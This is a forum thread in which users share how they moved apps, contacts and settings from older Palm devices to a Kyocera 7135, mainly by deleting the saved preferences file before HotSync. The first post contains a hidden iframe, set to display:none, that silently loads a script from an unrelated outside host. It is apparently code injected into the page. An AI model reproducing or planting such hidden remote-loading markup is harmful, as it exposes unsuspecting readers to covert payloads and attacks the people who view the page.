For those lucky enough to have one... can you confirm

or deny the difficulty in moving from a previous Palm install on your machine to the new 7135? Is this issue resolved? Was is ever really a reason for the delay?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't own one yet... but as I understand it, its just a matter of removing the saved preferences file. A actual owner who's done this will have to offically confirm this. (and my post will bring it to the top of the "new" pile for you.)

Just delete the saved preferences file from your backup directory on your PC.

I just replaced the 6035 cradle with the 7135 one (USB option) and pressed Hotsync and everything (contacts, dates, notes, memos, etc.) transferred perfectly intact.

I'm not sure of the issue you are addressing. Any time I previoulsy synched a new Palm device to an existing file (e.g., when I went from the PalmVx to the 6035) I would just be prompted with a question like "is this a new device for an existing user". Won't this still work with the 7135? If not, how would you sync existing data? I apologize if I'm missing the issue completely and you are talking about a completely differenct issue.

NO! the kyocera is a hybrid device and is not exactly like a plam device. simply syncing your old conventional palm device may erase some network settings or rewrite them (if your old palm had wireless access).

some people who did just this on their 6035s would get a "raise antenna to connect..." message... of course you dont need to raise any antenna on the 6035 to acquire a data connection...

so bottom line. its best to manually move your programs into the phone (drag and drop into the install folder in your profile) and sync your address book....

I used an unconventional method of transferring my old IIIc to my new 7135... I just beamed the various databases (addressbook, datebook, memos, to do, etc.) using Filez on the IIIc to push the info to the 7135. The 7135 then asks if it's OK to overwrite the existing database, choose yes. It was also cake to transfer a few of the smaller apps and utilities, like Crony, Benchmark, and RsrcEdit. As always, YMMV.

I followed the instructions as confirmed by Hotsync & Steve and all went better than expected. I have about 50 applications and 10 hacks. Everything transferred over including shortcuts and network settings. However, the *new* (for me) "Wireless Modem" connection which should have gotten installed did not get there. Because there was no saved preference file, I had to re-enter 20 or so registration codes. Fortunately, I keep them in a memo file so it was easy to cut/paste them in using hacks.

This install went easier than many hard resets I've had over the years.

It was easy for me. I had a 6035 before.

1. Synched the old device and backed up my PALM directory on my PC.

2. Deleted the saved preferences file in the PALM directory.

3. Synched.

4. Entered a few registration numbers on apps. Configured communications.

I understand why you need to delete the saved preferences file if you are upgrading to the 7135 from a palm device (in fact, I had to do that when I went from a Palm Vx to the 6035). However, is it definite that you still have to delete this file when upgrading to the 7135 from a 6035?

yes, becuause even though the 6035 and 7135 are prety much the same, the 7135 has some different features and may store certain libraries or apps in differentr locations. its alwasy BEST to start fresh when it comes to the apps being installed on the phone (you can usually sync your addy book/memos).
